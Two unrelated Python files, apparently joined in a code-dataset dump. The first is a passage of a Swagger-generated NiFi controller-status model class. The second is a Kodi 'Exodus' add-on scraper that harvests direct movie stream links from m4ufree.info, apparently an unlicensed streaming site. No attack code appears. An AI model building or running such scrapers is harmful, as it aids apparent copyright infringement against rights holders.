'stopped_count': 'int',
'invalid_count': 'int',
'disabled_count': 'int',
'active_remote_port_count': 'int',
'inactive_remote_port_count': 'int',
'up_to_date_count': 'int',
'locally_modified_count': 'int',
'stale_count': 'int',
'locally_modified_and_stale_count': 'int',
'sync_failure_count': 'int'
}
attribute_map = {
'active_thread_count': 'activeThreadCount',
'terminated_thread_count': 'terminatedThreadCount',
'queued': 'queued',
'flow_files_queued': 'flowFilesQueued',
'bytes_queued': 'bytesQueued',
'running_count': 'runningCount',
'stopped_count': 'stoppedCount',
'invalid_count': 'invalidCount',
'disabled_count': 'disabledCount',
'active_remote_port_count': 'activeRemotePortCount',
'inactive_remote_port_count': 'inactiveRemotePortCount',
'up_to_date_count': 'upToDateCount',
'locally_modified_count': 'locallyModifiedCount',
'stale_count': 'staleCount',
'locally_modified_and_stale_count': 'locallyModifiedAndStaleCount',
'sync_failure_count': 'syncFailureCount'
}
def __init__(self, active_thread_count=None, terminated_thread_count=None, queued=None, flow_files_queued=None, bytes_queued=None, running_count=None, stopped_count=None, invalid_count=None, disabled_count=None, active_remote_port_count=None, inactive_remote_port_count=None, up_to_date_count=None, locally_modified_count=None, stale_count=None, locally_modified_and_stale_count=None, sync_failure_count=None):
"""
ControllerStatusDTO - a model defined in Swagger
"""
self._active_thread_count = None
self._terminated_thread_count = None
self._queued = None
self._flow_files_queued = None
self._bytes_queued = None
self._running_count = None
self._stopped_count = None
self._invalid_count = None
self._disabled_count = None
self._active_remote_port_count = None
self._inactive_remote_port_count = None
self._up_to_date_count = None
self._locally_modified_count = None
self._stale_count = None
self._locally_modified_and_stale_count = None
self._sync_failure_count = None
if active_thread_count is not None:
self.active_thread_count = active_thread_count
if terminated_thread_count is not None:
self.terminated_thread_count = terminated_thread_count
if queued is not None:
self.queued = queued
if flow_files_queued is not None:
self.flow_files_queued = flow_files_queued
if bytes_queued is not None:
self.bytes_queued = bytes_queued
if running_count is not None:
self.running_count = running_count
if stopped_count is not None:
self.stopped_count = stopped_count
if invalid_count is not None:
self.invalid_count = invalid_count
if disabled_count is not None:
self.disabled_count = disabled_count
if active_remote_port_count is not None:
self.active_remote_port_count = active_remote_port_count
if inactive_remote_port_count is not None:
self.inactive_remote_port_count = inactive_remote_port_count
if up_to_date_count is not None:
self.up_to_date_count = up_to_date_count
if locally_modified_count is not None:
self.locally_modified_count = locally_modified_count
if stale_count is not None:
self.stale_count = stale_count
if locally_modified_and_stale_count is not None:
self.locally_modified_and_stale_count = locally_modified_and_stale_count
if sync_failure_count is not None:
self.sync_failure_count = sync_failure_count
@property
def active_thread_count(self):
"""
Gets the active_thread_count of this ControllerStatusDTO.
The number of active threads in the NiFi.
:return: The active_thread_count of this ControllerStatusDTO.
:rtype: int
"""
return self._active_thread_count
@active_thread_count.setter
def active_thread_count(self, active_thread_count):
"""
Sets the active_thread_count of this ControllerStatusDTO.
The number of active threads in the NiFi.
:param active_thread_count: The active_thread_count of this ControllerStatusDTO.
:type: int
"""
self._active_thread_count = active_thread_count
@property
def terminated_thread_count(self):
"""
Gets the terminated_thread_count of this ControllerStatusDTO.
The number of terminated threads in the NiFi.
:return: The terminated_thread_count of this ControllerStatusDTO.
:rtype: int
"""
return self._terminated_thread_count
@terminated_thread_count.setter
def terminated_thread_count(self, terminated_thread_count):
"""
Sets the terminated_thread_count of this ControllerStatusDTO.
The number of terminated threads in the NiFi.
:param terminated_thread_count: The terminated_thread_count of this ControllerStatusDTO.
:type: int
"""
self._terminated_thread_count = terminated_thread_count
@property
def queued(self):
"""
Gets the queued of this ControllerStatusDTO.
The number of flowfiles queued in the NiFi.
:return: The queued of this ControllerStatusDTO.
:rtype: str
"""
return self._queued
@queued.setter
def queued(self, queued):
"""
Sets the queued of this ControllerStatusDTO.
The number of flowfiles queued in the NiFi.
:param queued: The queued of this ControllerStatusDTO.
:type: str
"""
self._queued = queued
@property
def flow_files_queued(self):
"""
Gets the flow_files_queued of this ControllerStatusDTO.
The number of FlowFiles queued across the entire flow
:return: The flow_files_queued of this ControllerStatusDTO.
:rtype: int
"""
return self._flow_files_queued
@flow_files_queued.setter
def flow_files_queued(self, flow_files_queued):
"""
Sets the flow_files_queued of this ControllerStatusDTO.
The number of FlowFiles queued across the entire flow
:param flow_files_queued: The flow_files_queued of this ControllerStatusDTO.
:type: int
"""
self._flow_files_queued = flow_files_queued
@property
def bytes_queued(self):
"""
Gets the bytes_queued of this ControllerStatusDTO.
The size of the FlowFiles queued across the entire flow
:return: The bytes_queued of this ControllerStatusDTO.
:rtype: int
"""
return self._bytes_queued
@bytes_queued.setter
def bytes_queued(self, bytes_queued):
"""
Sets the bytes_queued of this ControllerStatusDTO.
The size of the FlowFiles queued across the entire flow
:param bytes_queued: The bytes_queued of this ControllerStatusDTO.
:type: int
"""
self._bytes_queued = bytes_queued
@property
def running_count(self):
"""
Gets the running_count of this ControllerStatusDTO.
The number of running components in the NiFi.
:return: The running_count of this ControllerStatusDTO.
:rtype: int
"""
return self._running_count
@running_count.setter
def running_count(self, running_count):
"""
Sets the running_count of this ControllerStatusDTO.
The number of running components in the NiFi.
:param running_count: The running_count of this ControllerStatusDTO.
:type: int
"""
self._running_count = running_count
@property
def stopped_count(self):
"""
Gets the stopped_count of this ControllerStatusDTO.
The number of stopped components in the NiFi.
:return: The stopped_count of this ControllerStatusDTO.
:rtype: int
"""
return self._stopped_count
@stopped_count.setter
def stopped_count(self, stopped_count):
"""
Sets the stopped_count of this ControllerStatusDTO.
The number of stopped components in the NiFi.
:param stopped_count: The stopped_count of this ControllerStatusDTO.
:type: int
"""
self._stopped_count = stopped_count
@property
def invalid_count(self):
"""
Gets the invalid_count of this ControllerStatusDTO.
The number of invalid components in the NiFi.
:return: The invalid_count of this ControllerStatusDTO.
:rtype: int
"""
return self._invalid_count
@invalid_count.setter
def invalid_count(self, invalid_count):
"""
Sets the invalid_count of this ControllerStatusDTO.
The number of invalid components in the NiFi.
:param invalid_count: The invalid_count of this ControllerStatusDTO.
:type: int
"""
self._invalid_count = invalid_count
@property
def disabled_count(self):
"""
Gets the disabled_count of this ControllerStatusDTO.
The number of disabled components in the NiFi.
:return: The disabled_count of this ControllerStatusDTO.
:rtype: int
"""
return self._disabled_count
@disabled_count.setter
def disabled_count(self, disabled_count):
"""
Sets the disabled_count of this ControllerStatusDTO.
The number of disabled components in the NiFi.
:param disabled_count: The disabled_count of this ControllerStatusDTO.
:type: int
"""
self._disabled_count = disabled_count
@property
def active_remote_port_count(self):
"""
Gets the active_remote_port_count of this ControllerStatusDTO.
The number of active remote ports in the NiFi.
:return: The active_remote_port_count of this ControllerStatusDTO.
:rtype: int
"""
return self._active_remote_port_count
@active_remote_port_count.setter
def active_remote_port_count(self, active_remote_port_count):
"""
Sets the active_remote_port_count of this ControllerStatusDTO.
The number of active remote ports in the NiFi.
:param active_remote_port_count: The active_remote_port_count of this ControllerStatusDTO.
:type: int
"""
self._active_remote_port_count = active_remote_port_count
@property
def inactive_remote_port_count(self):
"""
Gets the inactive_remote_port_count of this ControllerStatusDTO.
The number of inactive remote ports in the NiFi.
:return: The inactive_remote_port_count of this ControllerStatusDTO.
:rtype: int
"""
return self._inactive_remote_port_count
@inactive_remote_port_count.setter
def inactive_remote_port_count(self, inactive_remote_port_count):
"""
Sets the inactive_remote_port_count of this ControllerStatusDTO.
The number of inactive remote ports in the NiFi.
:param inactive_remote_port_count: The inactive_remote_port_count of this ControllerStatusDTO.
:type: int
"""
self._inactive_remote_port_count = inactive_remote_port_count
@property
def up_to_date_count(self):
"""
Gets the up_to_date_count of this ControllerStatusDTO.
The number of up to date versioned process groups in the NiFi.
:return: The up_to_date_count of this ControllerStatusDTO.
:rtype: int
"""
return self._up_to_date_count
@up_to_date_count.setter
def up_to_date_count(self, up_to_date_count):
"""
Sets the up_to_date_count of this ControllerStatusDTO.
The number of up to date versioned process groups in the NiFi.
:param up_to_date_count: The up_to_date_count of this ControllerStatusDTO.
:type: int
"""
self._up_to_date_count = up_to_date_count
@property
def locally_modified_count(self):
"""
Gets the locally_modified_count of this ControllerStatusDTO.
The number of locally modified versioned process groups in the NiFi.
:return: The locally_modified_count of this ControllerStatusDTO.
:rtype: int
"""
return self._locally_modified_count
@locally_modified_count.setter
def locally_modified_count(self, locally_modified_count):
"""
Sets the locally_modified_count of this ControllerStatusDTO.
The number of locally modified versioned process groups in the NiFi.
:param locally_modified_count: The locally_modified_count of this ControllerStatusDTO.
:type: int
"""
self._locally_modified_count = locally_modified_count
@property
def stale_count(self):
"""
Gets the stale_count of this ControllerStatusDTO.
The number of stale versioned process groups in the NiFi.
:return: The stale_count of this ControllerStatusDTO.
:rtype: int
"""
return self._stale_count
@stale_count.setter
def stale_count(self, stale_count):
"""
Sets the stale_count of this ControllerStatusDTO.
The number of stale versioned process groups in the NiFi.
:param stale_count: The stale_count of this ControllerStatusDTO.
:type: int
"""
self._stale_count = stale_count
@property
def locally_modified_and_stale_count(self):
"""
Gets the locally_modified_and_stale_count of this ControllerStatusDTO.
The number of locally modified and stale versioned process groups in the NiFi.
:return: The locally_modified_and_stale_count of this ControllerStatusDTO.
:rtype: int
"""
return self._locally_modified_and_stale_count
@locally_modified_and_stale_count.setter
def locally_modified_and_stale_count(self, locally_modified_and_stale_count):
"""
Sets the locally_modified_and_stale_count of this ControllerStatusDTO.
The number of locally modified and stale versioned process groups in the NiFi.
:param locally_modified_and_stale_count: The locally_modified_and_stale_count of this ControllerStatusDTO.
:type: int
"""
self._locally_modified_and_stale_count = locally_modified_and_stale_count
@property
def sync_failure_count(self):
"""
Gets the sync_failure_count of this ControllerStatusDTO.
The number of versioned process groups in the NiFi that are unable to sync to a registry.
:return: The sync_failure_count of this ControllerStatusDTO.
:rtype: int
"""
return self._sync_failure_count
@sync_failure_count.setter
def sync_failure_count(self, sync_failure_count):
"""
Sets the sync_failure_count of this ControllerStatusDTO.
The number of versioned process groups in the NiFi that are unable to sync to a registry.
:param sync_failure_count: The sync_failure_count of this ControllerStatusDTO.
:type: int
"""
self._sync_failure_count = sync_failure_count
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, ControllerStatusDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
# -*- coding: utf-8 -*-
'''
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import cache
from resources.lib.modules import directstream
class source:
def __init__(self):
self.domains = ['m4ufree.info']
self.base_link = 'http://m4ufree.info'
self.include_link = '/include/autocomplete.php?q='
self.search_link = '/tag/%s'
def movie(self, imdb, title, year):
try:
t = cleantitle.get(title)
#r = cache.get(self.mfree_mvcache, 170)
#r = [i for i in r if t == i[0] and year == i[1]][0]
q = (title.translate(None, '\/:*?"\'<>|!,')).replace(' ', '-').replace('--', '-').lower()
q = urlparse.urljoin(self.base_link, self.search_link % q)
r = client.request(q)
r = zip(client.parseDOM(r, 'a', ret='href', attrs = {'class': 'top-item'}), client.parseDOM(r, 'a', attrs = {'class': 'top-item'}))
r = [(i[0], re.sub('^Watch\s*|<.+?>|</.+?>', '', i[1])) for i in r]
r = [(i[0], re.findall('(.+?) (?:\(|)(\d{4})(?:\)|)$', i[1])) for i in r]
r = [(i[0], i[1][0][0], i[1][0][1]) for i in r if len(i[1]) > 0]
r = [i[0] for i in r if t == cleantitle.get(i[1]) and year == i[2]][0]
url = re.findall('(?://.+?|)(/.+)', r)[0]
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
return url
except:
return
def mfree_mvcache(self):
try:
u = urlparse.urljoin(self.base_link, self.include_link)
r = client.request(u).splitlines()
r = [re.findall('(.+?) (?:\(|)(\d{4})(?:\)|)$', i.strip()) for i in r]
r = [(cleantitle.get(i[0][0]), i[0][1]) for i in r if len(i) > 0]
return r
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
url = urlparse.urljoin(self.base_link, url)
r = client.request(url)
quality = client.parseDOM(r, 'h3', attrs = {'title': 'Quality.+?'})[0]
quality = client.parseDOM(quality, 'span')[0]
if quality.lower() in ['ts', 'tc', 'cam']: raise Exception()
url = client.parseDOM(r, 'a', ret='href')
url = [i for i in url if '-full-movie-' in i][0]
r = client.request(url)
headers = {'X-Requested-With': 'XMLHttpRequest', 'Referer': url}
servers = client.parseDOM(r, 'span', ret='link', attrs = {'class': '[^"]*btn-eps(?:\s+|)'})
for server in servers:
try:
url = '/demo.php?v=%s' % server
url = urlparse.urljoin(self.base_link, url)
r += str(client.request(url, headers=headers))
except:
pass
links = client.parseDOM(r, 'source', ret='src', attrs = {'type': 'video/mp4'})
links += client.parseDOM(r, 'iframe', ret='src')
for link in links:
try:
if not link.startswith('http'): link = urlparse.urljoin(self.base_link, link)
url = client.request(link, output='geturl')
quality = directstream.googletag(url)[0]['quality']
sources.append({'source': 'gvideo', 'quality': quality, 'provider': 'MFree', 'url': url, 'direct': True, 'debridonly': False})
except:
pass
return sources
except:
return sources
def resolve(self, url):
try:
url = client.request(url, output='geturl')
if 'requiressl=yes' in url: url = url.replace('http://', 'https://')
else: url = url.replace('https://', 'http://')
return url
except:
return
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.